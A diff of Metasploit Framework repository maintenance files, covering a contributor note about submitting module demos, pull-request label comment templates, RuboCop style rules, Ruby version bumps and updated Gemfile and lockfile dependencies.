If you are opening a PR for a new module that exploits a **specific** piece of hardware or requires a **complex or hard-to-find** testing environment, we recommend that you send us a demo of your module executing correctly. Seeing your module in action will help us review your PR faster!
|
||||
|
||||
Specific Hardware Examples:
|
||||
* Switches
|
||||
* Routers
|
||||
* IP Cameras
|
||||
* IoT devices
|
||||
|
||||
Complex Software Examples:
|
||||
* Expensive proprietary software
|
||||
* Software with an extensive installation process
|
||||
* Software that requires exploit testing across multiple significantly different versions
|
||||
* Software without an English language UI
|
||||
|
||||
We will also accept demonstrations of successful module execution even if your module doesn't meet the above conditions. It's not a necessity, but it may help us land your module faster!
|
||||
|
||||
Demonstration of successful module execution can take the form of a packet capture (pcap) or a screen recording. You can send pcaps and recordings to [msfdev@metaspolit.com](mailto:msfdev@metaspolit.com). Please include a CVE number in the subject header (if applicable), and a link to your PR in the email body.
|
||||
|
||||
@@ -0,0 +1,113 @@
|
||||
# Configuration for Github App - https://github.com/dessant/label-actions
|
||||
#
|
||||
# Note: Be aware of the edge cases of YAML when writing multiline strings:
|
||||
# - https://yaml-multiline.info/
|
||||
# - https://github.com/dessant/label-actions/issues/1
|
||||
pulls:
|
||||
actions:
|
||||
attic:
|
||||
close: true
|
||||
comment: |
|
||||
Thanks for your contribution to Metasploit Framework! We've looked at this pull request, and we agree that it seems like a good addition to Metasploit, but it looks like it is not quite ready to land. We've labeled it `attic` and closed it for now.
|
||||
|
||||
What does this generally mean? It could be one or more of several things:
|
||||
|
||||
- It doesn't look like there has been any activity on this pull request in a while
|
||||
- We may not have the proper access or equipment to test this pull request, or the contributor doesn't have time to work on it right now.
|
||||
- Sometimes the implementation isn't quite right and a different approach is necessary.
|
||||
|
||||
We would love to land this pull request when it's ready. If you have a chance to address all comments, we would be happy to reopen and discuss how to merge this!
|
||||
|
||||
needs-docs:
|
||||
comment: |
|
||||
Thanks for your pull request! Before this can be merged, we need the following documentation for your module:
|
||||
|
||||
- [Writing Module Documentation](https://github.com/rapid7/metasploit-framework/wiki/Writing-Module-Documentation)
|
||||
- [Template](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/module_doc_template.md)
|
||||
- [Examples](https://github.com/rapid7/metasploit-framework/tree/master/documentation/modules)
|
||||
|
||||
needs-linting:
|
||||
comment: |
|
||||
Thanks for your pull request! Before this pull request can be merged, it must pass the checks of our automated linting tools.
|
||||
|
||||
We use Rubocop and msftidy to ensure the quality of our code. This can be ran from the root directory of Metasploit:
|
||||
|
||||
```
|
||||
rubocop <directory or file>
|
||||
tools/dev/msftidy.rb <directory or file>
|
||||
```
|
||||
|
||||
You can automate most of these changes with the `-a` flag:
|
||||
|
||||
```
|
||||
rubocop -a <directory or file>
|
||||
```
|
||||
|
||||
Please update your branch after these have been made, and reach out if you have any problems.
|
||||
|
||||
needs-unique-branch:
|
||||
close: true
|
||||
comment: |
|
||||
Thanks for your pull request! We require for all contributed code to come from a **from a unique branch** in your repository before it can be merged.
|
||||
|
||||
Please create a new branch in your fork of framework and resubmit this from that branch.
|
||||
|
||||
If you are using Git on the command line that may look like:
|
||||
|
||||
```
|
||||
# Checkout the master branch
|
||||
git checkout master
|
||||
|
||||
# Create a new branch for your feature
|
||||
git checkout -b <BRANCH_NAME>
|
||||
|
||||
# Add your new files
|
||||
git add modules/my-cool-new-module
|
||||
|
||||
# Commit your changes with a relevant message
|
||||
git commit
|
||||
|
||||
# Push your changes to GitHub
|
||||
git push origin <BRANCH_NAME>
|
||||
|
||||
# Now browse to the following URL and create your pull request!
|
||||
# - https://github.com/rapid7/metasploit-framework/pulls
|
||||
```
|
||||
|
||||
This helps protect the process, ensure users are aware of commits on the branch being considered for merge, allows for a location for more commits to be offered without mingling with other contributor changes and allows contributors to make progress while a PR is still being reviewed.
|
||||
|
||||
Please do resubmit from a unique branch, we greatly value your contribution! :tada:
|
||||
|
||||
needs-testing-environment:
|
||||
comment: |
|
||||
Thanks for your pull request! As part of our landing process, we manually verify that all modules work as expected.
|
||||
|
||||
We have been unable to test this module successfully. This may be due to software or hardware requirements we cannot replicate.
|
||||
|
||||
To help unblock this pull request, please:
|
||||
|
||||
- Comment with links to documentation on how to set up an environment, and provide exact software version numbers to use
|
||||
- Or comment guided steps on how to set up our environment for testing this module
|
||||
- Or send pcaps/screenshots/recordings of it working - you can email us msfdev[at]rapid7.com
|
||||
|
||||
Once there's a clear path for testing and evaluating this module, we can progress with this further.
|
||||
|
||||
issues:
|
||||
actions:
|
||||
termux:
|
||||
comment: |
|
||||
Termux is not officially supported. https://github.com/rapid7/metasploit-framework/issues/11023
|
||||
|
||||
However, Metasploit reportedly does work with Termux.
|
||||
|
||||
Refer to the following for more information:
|
||||
|
||||
* https://wiki.termux.com/wiki/Metasploit_Framework
|
||||
* termux/termux-packages/issues/715
|
||||
|
||||
potato:
|
||||
close: true
|
||||
comment: |
|
||||
When creating an issue, please ensure that the default issue template has been updated with the required details.
|
||||
|
||||
Closing this issue. If you believe this issue has been closed in error, please provide any relevant output and logs which may be useful in diagnosing the issue.
|
||||
@@ -12,6 +12,7 @@ cdoughty-r7 <cdoughty-r7@github> <chris_doughty@rapid7.com>
|
||||
dheiland-r7 <dheiland-r7@github> <dh@layereddefense.com>
|
||||
dwelch-r7 <dwelch-r7@github> <dean_welch@rapid7.com>
|
||||
ecarey-r7 <ecarey-r7@github> <e@ipwnstuff.com>
|
||||
gwillcox-r7 <gwillcox-r7@github> <Grant_Willcox@rapid7.com>
|
||||
jbarnett-r7 <jbarnett-r7@github> <James_Barnett@rapid7.com>
|
||||
jbarnett-r7 <jbarnett-r7@github> <jbarnett@rapid7.com>
|
||||
jinq102030 <jinq102030@github> <Jin_Qian@rapid7.com>
|
||||
|
||||
+81
-20
@@ -11,6 +11,16 @@
|
||||
AllCops:
|
||||
TargetRubyVersion: 2.4
|
||||
|
||||
require:
|
||||
- ./lib/rubocop/cop/layout/module_hash_on_new_line.rb
|
||||
- ./lib/rubocop/cop/layout/module_description_indentation.rb
|
||||
|
||||
Layout/ModuleHashOnNewLine:
|
||||
Enabled: true
|
||||
|
||||
Layout/ModuleDescriptionIndentation:
|
||||
Enabled: true
|
||||
|
||||
Metrics/ClassLength:
|
||||
Description: 'Most Metasploit modules are quite large. This is ok.'
|
||||
Enabled: true
|
||||
@@ -59,6 +69,25 @@ Style/Documentation:
|
||||
Exclude:
|
||||
- 'modules/**/*'
|
||||
|
||||
Layout/FirstArgumentIndentation:
|
||||
Enabled: true
|
||||
EnforcedStyle: consistent
|
||||
Description: 'Useful for the module hash to be indented consistently'
|
||||
|
||||
Layout/ArgumentAlignment:
|
||||
Enabled: true
|
||||
EnforcedStyle: with_first_argument
|
||||
Description: 'Useful for the module hash to be indented consistently'
|
||||
|
||||
Layout/FirstHashElementIndentation:
|
||||
Enabled: true
|
||||
EnforcedStyle: consistent
|
||||
Description: 'Useful for the module hash to be indented consistently'
|
||||
|
||||
Layout/FirstHashElementLineBreak:
|
||||
Enabled: true
|
||||
Description: 'Enforce consistency by breaking hash elements on to new lines'
|
||||
|
||||
Layout/SpaceInsideArrayLiteralBrackets:
|
||||
Enabled: false
|
||||
Description: 'Almost all module metadata have space in brackets'
|
||||
@@ -93,26 +122,26 @@ Style/TrailingCommaInArrayLiteral:
|
||||
|
||||
Metrics/LineLength:
|
||||
Description: >-
|
||||
Metasploit modules often pattern match against very
|
||||
long strings when identifying targets.
|
||||
Metasploit modules often pattern match against very
|
||||
long strings when identifying targets.
|
||||
Enabled: true
|
||||
Max: 180
|
||||
|
||||
Metrics/BlockLength:
|
||||
Enabled: true
|
||||
Description: >-
|
||||
While the style guide suggests 10 lines, exploit definitions
|
||||
often exceed 200 lines.
|
||||
While the style guide suggests 10 lines, exploit definitions
|
||||
often exceed 200 lines.
|
||||
Max: 300
|
||||
|
||||
Metrics/MethodLength:
|
||||
Enabled: true
|
||||
Description: >-
|
||||
While the style guide suggests 10 lines, exploit definitions
|
||||
often exceed 200 lines.
|
||||
While the style guide suggests 10 lines, exploit definitions
|
||||
often exceed 200 lines.
|
||||
Max: 300
|
||||
|
||||
Naming/MethodParameterName:
|
||||
Naming/MethodParameterName:
|
||||
Enabled: true
|
||||
Description: 'Whoever made this requirement never looked at crypto methods, IV'
|
||||
MinNameLength: 2
|
||||
@@ -126,13 +155,14 @@ Style/NumericLiterals:
|
||||
Enabled: false
|
||||
Description: 'This often hurts readability for exploit-ish code.'
|
||||
|
||||
Layout/HashAlignment:
|
||||
Enabled: false
|
||||
Description: 'aligning info hashes to match these rules is almost impossible to get right'
|
||||
Layout/FirstArrayElementLineBreak:
|
||||
Enabled: true
|
||||
Description: 'This cop checks for a line break before the first element in a multi-line array.'
|
||||
|
||||
Layout/EmptyLines:
|
||||
Enabled: false
|
||||
Description: 'these are used to increase readability'
|
||||
Layout/FirstArrayElementIndentation:
|
||||
Enabled: true
|
||||
EnforcedStyle: consistent
|
||||
Description: 'Useful to force values within the register_options array to have sane indentation'
|
||||
|
||||
Layout/EmptyLinesAroundClassBody:
|
||||
Enabled: false
|
||||
@@ -142,19 +172,24 @@ Layout/EmptyLinesAroundMethodBody:
|
||||
Enabled: false
|
||||
Description: 'these are used to increase readability'
|
||||
|
||||
Layout/ParameterAlignment:
|
||||
Layout/ExtraSpacing:
|
||||
Description: 'Do not use unnecessary spacing.'
|
||||
Enabled: true
|
||||
EnforcedStyle: 'with_fixed_indentation'
|
||||
Description: 'initialize method of every module has fixed indentation for Name, Description, etc'
|
||||
# When true, allows most uses of extra spacing if the intent is to align
|
||||
# things with the previous or next line, not counting empty lines or comment
|
||||
# lines.
|
||||
AllowForAlignment: false
|
||||
# When true, allows things like 'obj.meth(arg) # comment',
|
||||
# rather than insisting on 'obj.meth(arg) # comment'.
|
||||
# If done for alignment, either this OR AllowForAlignment will allow it.
|
||||
AllowBeforeTrailingComments: false
|
||||
# When true, forces the alignment of `=` in assignments on consecutive lines.
|
||||
ForceEqualSignAlignment: false
|
||||
|
||||
Style/For:
|
||||
Enabled: false
|
||||
Description: 'if a module is written with a for loop, it cannot always be logically replaced with each'
|
||||
|
||||
Style/StringLiterals:
|
||||
Enabled: false
|
||||
Description: 'Single vs double quote fights are largely unproductive.'
|
||||
|
||||
Style/WordArray:
|
||||
Enabled: false
|
||||
Description: 'Metasploit prefers consistent use of []'
|
||||
@@ -163,6 +198,22 @@ Style/IfUnlessModifier:
|
||||
Enabled: false
|
||||
Description: 'This style might save a couple of lines, but often makes code less clear'
|
||||
|
||||
Style/PercentLiteralDelimiters:
|
||||
Description: 'Use `%`-literal delimiters consistently.'
|
||||
Enabled: true
|
||||
# Specify the default preferred delimiter for all types with the 'default' key
|
||||
# Override individual delimiters (even with default specified) by specifying
|
||||
# an individual key
|
||||
PreferredDelimiters:
|
||||
default: ()
|
||||
'%i': '[]'
|
||||
'%I': '[]'
|
||||
'%r': '{}'
|
||||
'%w': '[]'
|
||||
'%W': '[]'
|
||||
'%q': '{}' # Chosen for module descriptions as () are frequently used characters, whilst {} are rarely used
|
||||
VersionChanged: '0.48.1'
|
||||
|
||||
Style/RedundantBegin:
|
||||
Exclude:
|
||||
# this pattern is very common and somewhat unavoidable
|
||||
@@ -177,6 +228,16 @@ Style/RedundantBegin:
|
||||
# end
|
||||
- 'modules/**/*'
|
||||
|
||||
Style/SafeNavigation:
|
||||
Description: >-
|
||||
This cop transforms usages of a method call safeguarded by
|
||||
a check for the existence of the object to
|
||||
safe navigation (`&.`).
|
||||
|
||||
This has been disabled as in some scenarios it produced invalid code, and disobeyed the 'AllowedMethods'
|
||||
configuration.
|
||||
Enabled: false
|
||||
|
||||
Documentation:
|
||||
Exclude:
|
||||
- 'modules/**/*'
|
||||
|
||||
+1
-1
@@ -1 +1 @@
|
||||
2.6.5
|
||||
2.6.6
|
||||
|
||||
+2
-2
@@ -11,8 +11,8 @@ addons:
|
||||
- graphviz
|
||||
language: ruby
|
||||
rvm:
|
||||
- '2.5.7'
|
||||
- '2.6.5'
|
||||
- '2.5.8'
|
||||
- '2.6.6'
|
||||
|
||||
env:
|
||||
- CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"'
|
||||
|
||||
+1
-1
@@ -1,4 +1,4 @@
|
||||
FROM ruby:2.6.5-alpine3.10 AS builder
|
||||
FROM ruby:2.6.6-alpine3.10 AS builder
|
||||
LABEL maintainer="Rapid7"
|
||||
|
||||
ARG BUNDLER_ARGS="--jobs=8 --without development test coverage"
|
||||
|
||||
@@ -8,7 +8,7 @@ gem 'sqlite3', '~>1.3.0'
|
||||
# separate from test as simplecov is not run on travis-ci
|
||||
group :coverage do
|
||||
# code coverage for tests
|
||||
gem 'simplecov'
|
||||
gem 'simplecov', '0.18.2'
|
||||
end
|
||||
|
||||
group :development do
|
||||
@@ -17,9 +17,13 @@ group :development do
|
||||
# generating documentation
|
||||
gem 'yard'
|
||||
# for development and testing purposes
|
||||
gem 'pry'
|
||||
gem 'pry-byebug'
|
||||
# module documentation
|
||||
gem 'octokit'
|
||||
# memory profiling
|
||||
gem 'memory_profiler'
|
||||
# cpu profiling
|
||||
gem 'ruby-prof'
|
||||
# Metasploit::Aggregator external session proxy
|
||||
# disabled during 2.5 transition until aggregator is available
|
||||
#gem 'metasploit-aggregator'
|
||||
@@ -36,6 +40,7 @@ group :development, :test do
|
||||
# environment is development
|
||||
gem 'rspec-rails'
|
||||
gem 'rspec-rerun'
|
||||
gem 'rubocop'
|
||||
gem 'swagger-blocks'
|
||||
end
|
||||
|
||||
|
||||
+126
-83
@@ -1,7 +1,7 @@
|
||||
PATH
|
||||
remote: .
|
||||
specs:
|
||||
metasploit-framework (5.0.73)
|
||||
metasploit-framework (5.0.95)
|
||||
actionpack (~> 4.2.6)
|
||||
activerecord (~> 4.2.6)
|
||||
activesupport (~> 4.2.6)
|
||||
@@ -11,27 +11,31 @@ PATH
|
||||
bcrypt (= 3.1.12)
|
||||
bcrypt_pbkdf
|
||||
bit-struct
|
||||
bson
|
||||
concurrent-ruby (= 1.0.5)
|
||||
dnsruby
|
||||
ed25519
|
||||
em-http-request
|
||||
eventmachine
|
||||
faker
|
||||
faraday (<= 0.17.0)
|
||||
faraday
|
||||
faye-websocket
|
||||
filesize
|
||||
hrr_rb_ssh (= 0.3.0.pre2)
|
||||
irb
|
||||
jsobfu
|
||||
json
|
||||
metasm
|
||||
metasploit-concern (~> 2.0.0)
|
||||
metasploit-credential (~> 3.0.0)
|
||||
metasploit-model (~> 2.0.4)
|
||||
metasploit-payloads (= 1.3.84)
|
||||
metasploit-payloads (= 1.4.2)
|
||||
metasploit_data_models (~> 3.0.10)
|
||||
metasploit_payloads-mettle (= 0.5.16)
|
||||
metasploit_payloads-mettle (= 0.5.21)
|
||||
mqtt
|
||||
msgpack
|
||||
nessus_rest
|
||||
net-ldap
|
||||
net-ssh
|
||||
network_interface
|
||||
nexpose
|
||||
@@ -67,7 +71,7 @@ PATH
|
||||
rex-text
|
||||
rex-zip
|
||||
ruby-macho
|
||||
ruby_smb
|
||||
ruby_smb (~> 1.1)
|
||||
rubyntlm
|
||||
rubyzip
|
||||
sinatra
|
||||
@@ -85,27 +89,27 @@ GEM
|
||||
remote: https://rubygems.org/
|
||||
specs:
|
||||
Ascii85 (1.0.3)
|
||||
actionpack (4.2.11.1)
|
||||
actionview (= 4.2.11.1)
|
||||
activesupport (= 4.2.11.1)
|
||||
actionpack (4.2.11.3)
|
||||
actionview (= 4.2.11.3)
|
||||
activesupport (= 4.2.11.3)
|
||||
rack (~> 1.6)
|
||||
rack-test (~> 0.6.2)
|
||||
rails-dom-testing (~> 1.0, >= 1.0.5)
|
||||
rails-html-sanitizer (~> 1.0, >= 1.0.2)
|
||||
actionview (4.2.11.1)
|
||||
activesupport (= 4.2.11.1)
|
||||
actionview (4.2.11.3)
|
||||
activesupport (= 4.2.11.3)
|
||||
builder (~> 3.1)
|
||||
erubis (~> 2.7.0)
|
||||
rails-dom-testing (~> 1.0, >= 1.0.5)
|
||||
rails-html-sanitizer (~> 1.0, >= 1.0.3)
|
||||
activemodel (4.2.11.1)
|
||||
activesupport (= 4.2.11.1)
|
||||
activemodel (4.2.11.3)
|
||||
activesupport (= 4.2.11.3)
|
||||
builder (~> 3.1)
|
||||
activerecord (4.2.11.1)
|
||||
activemodel (= 4.2.11.1)
|
||||
activesupport (= 4.2.11.1)
|
||||
activerecord (4.2.11.3)
|
||||
activemodel (= 4.2.11.3)
|
||||
activesupport (= 4.2.11.3)
|
||||
arel (~> 6.0)
|
||||
activesupport (4.2.11.1)
|
||||
activesupport (4.2.11.3)
|
||||
i18n (~> 0.7)
|
||||
minitest (~> 5.1)
|
||||
thread_safe (~> 0.3, >= 0.3.4)
|
||||
@@ -116,34 +120,37 @@ GEM
|
||||
arel (6.0.4)
|
||||
arel-helpers (2.11.0)
|
||||
activerecord (>= 3.1.0, < 7)
|
||||
aws-eventstream (1.0.3)
|
||||
aws-partitions (1.269.0)
|
||||
aws-sdk-core (3.89.1)
|
||||
aws-eventstream (~> 1.0, >= 1.0.2)
|
||||
ast (2.4.1)
|
||||
aws-eventstream (1.1.0)
|
||||
aws-partitions (1.330.0)
|
||||
aws-sdk-core (3.100.0)
|
||||
aws-eventstream (~> 1, >= 1.0.2)
|
||||
aws-partitions (~> 1, >= 1.239.0)
|
||||
aws-sigv4 (~> 1.1)
|
||||
jmespath (~> 1.0)
|
||||
aws-sdk-ec2 (1.137.0)
|
||||
aws-sdk-core (~> 3, >= 3.71.0)
|
||||
aws-sdk-ec2 (1.167.0)
|
||||
aws-sdk-core (~> 3, >= 3.99.0)
|
||||
aws-sigv4 (~> 1.1)
|
||||
aws-sdk-iam (1.33.0)
|
||||
aws-sdk-core (~> 3, >= 3.71.0)
|
||||
aws-sdk-iam (1.40.1)
|
||||
aws-sdk-core (~> 3, >= 3.99.0)
|
||||
aws-sigv4 (~> 1.1)
|
||||
aws-sdk-kms (1.28.0)
|
||||
aws-sdk-core (~> 3, >= 3.71.0)
|
||||
aws-sdk-kms (1.34.1)
|
||||
aws-sdk-core (~> 3, >= 3.99.0)
|
||||
aws-sigv4 (~> 1.1)
|
||||
aws-sdk-s3 (1.60.1)
|
||||
aws-sdk-core (~> 3, >= 3.83.0)
|
||||
aws-sdk-s3 (1.68.1)
|
||||
aws-sdk-core (~> 3, >= 3.99.0)
|
||||
aws-sdk-kms (~> 1)
|
||||
aws-sigv4 (~> 1.1)
|
||||
aws-sigv4 (1.1.0)
|
||||
aws-eventstream (~> 1.0, >= 1.0.2)
|
||||
aws-sigv4 (1.2.0)
|
||||
aws-eventstream (~> 1, >= 1.0.2)
|
||||
bcrypt (3.1.12)
|
||||
bcrypt_pbkdf (1.0.1)
|
||||
bindata (2.4.4)
|
||||
bindata (2.4.7)
|
||||
bit-struct (0.16)
|
||||
bson (4.9.2)
|
||||
builder (3.2.4)
|
||||
coderay (1.1.2)
|
||||
byebug (11.1.3)
|
||||
coderay (1.1.3)
|
||||
concurrent-ruby (1.0.5)
|
||||
cookiejar (0.3.3)
|
||||
crass (1.0.6)
|
||||
@@ -153,7 +160,7 @@ GEM
|
||||
addressable (~> 2.5)
|
||||
docile (1.3.2)
|
||||
ed25519 (1.2.4)
|
||||
em-http-request (1.1.5)
|
||||
em-http-request (1.1.6)
|
||||
addressable (>= 2.3.4)
|
||||
cookiejar (!= 0.3.1)
|
||||
em-socksify (>= 0.3)
|
||||
@@ -163,14 +170,14 @@ GEM
|
||||
eventmachine (>= 1.0.0.beta.4)
|
||||
erubis (2.7.0)
|
||||
eventmachine (1.2.7)
|
||||
factory_bot (5.1.1)
|
||||
factory_bot (5.2.0)
|
||||
activesupport (>= 4.2.0)
|
||||
factory_bot_rails (5.1.1)
|
||||
factory_bot (~> 5.1.0)
|
||||
factory_bot_rails (5.2.0)
|
||||
factory_bot (~> 5.2.0)
|
||||
railties (>= 4.2.0)
|
||||
faker (2.2.1)
|
||||
i18n (>= 0.8)
|
||||
faraday (0.17.0)
|
||||
faraday (1.0.1)
|
||||
multipart-post (>= 1.2, < 3)
|
||||
faye-websocket (0.10.9)
|
||||
eventmachine (>= 0.12.0)
|
||||
@@ -178,16 +185,22 @@ GEM
|
||||
filesize (0.2.0)
|
||||
fivemat (1.3.7)
|
||||
hashery (2.1.2)
|
||||
hrr_rb_ssh (0.3.0.pre2)
|
||||
ed25519 (~> 1.2)
|
||||
http_parser.rb (0.6.0)
|
||||
i18n (0.9.5)
|
||||
concurrent-ruby (~> 1.0)
|
||||
io-console (0.5.6)
|
||||
irb (1.2.4)
|
||||
reline (>= 0.0.1)
|
||||
jmespath (1.4.0)
|
||||
jsobfu (0.4.2)
|
||||
rkelly-remix
|
||||
json (2.3.0)
|
||||
loofah (2.4.0)
|
||||
loofah (2.6.0)
|
||||
crass (~> 1.0.2)
|
||||
nokogiri (>= 1.5.9)
|
||||
memory_profiler (0.9.14)
|
||||
metasm (1.0.4)
|
||||
metasploit-concern (2.0.5)
|
||||
activemodel (~> 4.2.6)
|
||||
@@ -207,7 +220,7 @@ GEM
|
||||
activemodel (~> 4.2.6)
|
||||
activesupport (~> 4.2.6)
|
||||
railties (~> 4.2.6)
|
||||
metasploit-payloads (1.3.84)
|
||||
metasploit-payloads (1.4.2)
|
||||
metasploit_data_models (3.0.10)
|
||||
activerecord (~> 4.2.6)
|
||||
activesupport (~> 4.2.6)
|
||||
@@ -218,26 +231,30 @@ GEM
|
||||
postgres_ext
|
||||
railties (~> 4.2.6)
|
||||
recog (~> 2.0)
|
||||
metasploit_payloads-mettle (0.5.16)
|
||||
method_source (0.9.2)
|
||||
metasploit_payloads-mettle (0.5.21)
|
||||
method_source (1.0.0)
|
||||
mini_portile2 (2.4.0)
|
||||
minitest (5.14.0)
|
||||
minitest (5.14.1)
|
||||
mqtt (0.5.0)
|
||||
msgpack (1.3.1)
|
||||
msgpack (1.3.3)
|
||||
multipart-post (2.1.1)
|
||||
nessus_rest (0.1.6)
|
||||
net-ssh (5.2.0)
|
||||
net-ldap (0.16.2)
|
||||
net-ssh (6.1.0)
|
||||
network_interface (0.0.2)
|
||||
nexpose (7.2.1)
|
||||
nokogiri (1.10.7)
|
||||
nokogiri (1.10.9)
|
||||
mini_portile2 (~> 2.4.0)
|
||||
octokit (4.15.0)
|
||||
octokit (4.18.0)
|
||||
faraday (>= 0.9)
|
||||
sawyer (~> 0.8.0, >= 0.5.3)
|
||||
openssl-ccm (1.2.2)
|
||||
openvas-omp (0.0.4)
|
||||
packetfu (1.1.13)
|
||||
pcaprub
|
||||
parallel (1.19.2)
|
||||
parser (2.7.1.3)
|
||||
ast (~> 2.4.0)
|
||||
patch_finder (1.0.2)
|
||||
pcaprub (0.13.0)
|
||||
pdf-reader (2.4.0)
|
||||
@@ -252,11 +269,14 @@ GEM
|
||||
activerecord (~> 4.0)
|
||||
arel (>= 4.0.1)
|
||||
pg_array_parser (~> 0.0.9)
|
||||
pry (0.12.2)
|
||||
coderay (~> 1.1.0)
|
||||
method_source (~> 0.9.0)
|
||||
public_suffix (4.0.3)
|
||||
rack (1.6.12)
|
||||
pry (0.13.1)
|
||||
coderay (~> 1.1)
|
||||
method_source (~> 1.0)
|
||||
pry-byebug (3.9.0)
|
||||
byebug (~> 11.0)
|
||||
pry (~> 0.13.0)
|
||||
public_suffix (4.0.5)
|
||||
rack (1.6.13)
|
||||
rack-protection (1.5.5)
|
||||
rack
|
||||
rack-test (0.6.3)
|
||||
@@ -269,16 +289,20 @@ GEM
|
||||
rails-deprecated_sanitizer (>= 1.0.1)
|
||||
rails-html-sanitizer (1.3.0)
|
||||
loofah (~> 2.3)
|
||||
railties (4.2.11.1)
|
||||
actionpack (= 4.2.11.1)
|
||||
activesupport (= 4.2.11.1)
|
||||
railties (4.2.11.3)
|
||||
actionpack (= 4.2.11.3)
|
||||
activesupport (= 4.2.11.3)
|
||||
rake (>= 0.8.7)
|
||||
thor (>= 0.18.1, < 2.0)
|
||||
rainbow (3.0.0)
|
||||
rake (13.0.1)
|
||||
rb-readline (0.5.5)
|
||||
recog (2.3.6)
|
||||
recog (2.3.8)
|
||||
nokogiri
|
||||
redcarpet (3.5.0)
|
||||
regexp_parser (1.7.1)
|
||||
reline (0.1.4)
|
||||
io-console (~> 0.5)
|
||||
rex-arch (0.1.13)
|
||||
rex-text
|
||||
rex-bin_tools (0.1.6)
|
||||
@@ -292,7 +316,7 @@ GEM
|
||||
metasm
|
||||
rex-arch
|
||||
rex-text
|
||||
rex-exploitation (0.1.22)
|
||||
rex-exploitation (0.1.24)
|
||||
jsobfu
|
||||
metasm
|
||||
rex-arch
|
||||
@@ -305,9 +329,10 @@ GEM
|
||||
rex-arch
|
||||
rex-ole (0.1.6)
|
||||
rex-text
|
||||
rex-powershell (0.1.84)
|
||||
rex-powershell (0.1.87)
|
||||
rex-random_identifier
|
||||
rex-text
|
||||
ruby-rc4
|
||||
rex-random_identifier (0.1.4)
|
||||
rex-text
|
||||
rex-registry (0.1.3)
|
||||
@@ -315,55 +340,69 @@ GEM
|
||||
metasm
|
||||
rex-core
|
||||
rex-text
|
||||
rex-socket (0.1.21)
|
||||
rex-socket (0.1.23)
|
||||
rex-core
|
||||
rex-sslscan (0.1.5)
|
||||
rex-core
|
||||
rex-socket
|
||||
rex-text
|
||||
rex-struct2 (0.1.2)
|
||||
rex-text (0.2.24)
|
||||
rex-text (0.2.26)
|
||||
rex-zip (0.1.3)
|
||||
rex-text
|
||||
rexml (3.2.4)
|
||||
rkelly-remix (0.0.7)
|
||||
rspec (3.9.0)
|
||||
rspec-core (~> 3.9.0)
|
||||
rspec-expectations (~> 3.9.0)
|
||||
rspec-mocks (~> 3.9.0)
|
||||
rspec-core (3.9.1)
|
||||
rspec-support (~> 3.9.1)
|
||||
rspec-expectations (3.9.0)
|
||||
rspec-core (3.9.2)
|
||||
rspec-support (~> 3.9.3)
|
||||
rspec-expectations (3.9.2)
|
||||
diff-lcs (>= 1.2.0, < 2.0)
|
||||
rspec-support (~> 3.9.0)
|
||||
rspec-mocks (3.9.1)
|
||||
diff-lcs (>= 1.2.0, < 2.0)
|
||||
rspec-support (~> 3.9.0)
|
||||
rspec-rails (3.9.0)
|
||||
actionpack (>= 3.0)
|
||||
activesupport (>= 3.0)
|
||||
railties (>= 3.0)
|
||||
rspec-core (~> 3.9.0)
|
||||
rspec-expectations (~> 3.9.0)
|
||||
rspec-mocks (~> 3.9.0)
|
||||
rspec-support (~> 3.9.0)
|
||||
rspec-rails (4.0.1)
|
||||
actionpack (>= 4.2)
|
||||
activesupport (>= 4.2)
|
||||
railties (>= 4.2)
|
||||
rspec-core (~> 3.9)
|
||||
rspec-expectations (~> 3.9)
|
||||
rspec-mocks (~> 3.9)
|
||||
rspec-support (~> 3.9)
|
||||
rspec-rerun (1.1.0)
|
||||
rspec (~> 3.0)
|
||||
rspec-support (3.9.2)
|
||||
rspec-support (3.9.3)
|
||||
rubocop (0.85.1)
|
||||
parallel (~> 1.10)
|
||||
parser (>= 2.7.0.1)
|
||||
rainbow (>= 2.2.2, < 4.0)
|
||||
regexp_parser (>= 1.7)
|
||||
rexml
|
||||
rubocop-ast (>= 0.0.3)
|
||||
ruby-progressbar (~> 1.7)
|
||||
unicode-display_width (>= 1.4.0, < 2.0)
|
||||
rubocop-ast (0.0.3)
|
||||
parser (>= 2.7.0.1)
|
||||
ruby-macho (2.2.0)
|
||||
ruby-prof (1.4.1)
|
||||
ruby-progressbar (1.10.1)
|
||||
ruby-rc4 (0.1.5)
|
||||
ruby_smb (1.1.0)
|
||||
bindata
|
||||
rubyntlm
|
||||
windows_error
|
||||
rubyntlm (0.6.2)
|
||||
rubyzip (2.1.0)
|
||||
rubyzip (2.3.0)
|
||||
sawyer (0.8.2)
|
||||
addressable (>= 2.3.5)
|
||||
faraday (> 0.8, < 2.0)
|
||||
simplecov (0.18.0)
|
||||
simplecov (0.18.2)
|
||||
docile (~> 1.1)
|
||||
simplecov-html (~> 0.11.0)
|
||||
simplecov-html (0.11.0)
|
||||
simplecov-html (~> 0.11)
|
||||
simplecov-html (0.12.2)
|
||||
sinatra (1.4.8)
|
||||
rack (~> 1.5)
|
||||
rack-protection (~> 1.4)
|
||||
@@ -379,22 +418,23 @@ GEM
|
||||
thread_safe (0.3.6)
|
||||
tilt (2.0.10)
|
||||
timecop (0.9.1)
|
||||
ttfunk (1.6.1)
|
||||
tzinfo (1.2.6)
|
||||
ttfunk (1.6.2.1)
|
||||
tzinfo (1.2.7)
|
||||
thread_safe (~> 0.1)
|
||||
tzinfo-data (1.2019.3)
|
||||
tzinfo-data (1.2020.1)
|
||||
tzinfo (>= 1.0.0)
|
||||
unicode-display_width (1.7.0)
|
||||
warden (1.2.7)
|
||||
rack (>= 1.0)
|
||||
websocket-driver (0.7.1)
|
||||
websocket-driver (0.7.2)
|
||||
websocket-extensions (>= 0.1.0)
|
||||
websocket-extensions (0.1.4)
|
||||
websocket-extensions (0.1.5)
|
||||
windows_error (0.1.2)
|
||||
xdr (2.0.0)
|
||||
activemodel (>= 4.2.7)
|
||||
activesupport (>= 4.2.7)
|
||||
xmlrpc (0.3.0)
|
||||
yard (0.9.24)
|
||||
yard (0.9.25)
|
||||
|
||||
PLATFORMS
|
||||
ruby
|
||||
@@ -402,14 +442,17 @@ PLATFORMS
|
||||
DEPENDENCIES
|
||||
factory_bot_rails
|
||||
fivemat
|
||||
memory_profiler
|
||||
metasploit-framework!
|
||||
octokit
|
||||
pry
|
||||
pry-byebug
|
||||
rake
|
||||
redcarpet
|
||||
rspec-rails
|
||||
rspec-rerun
|
||||
simplecov
|
||||
rubocop
|
||||
ruby-prof
|
||||
simplecov (= 0.18.2)
|
||||
sqlite3 (~> 1.3.0)
|
||||
swagger-blocks
|
||||
timecop
|
||||
|
||||
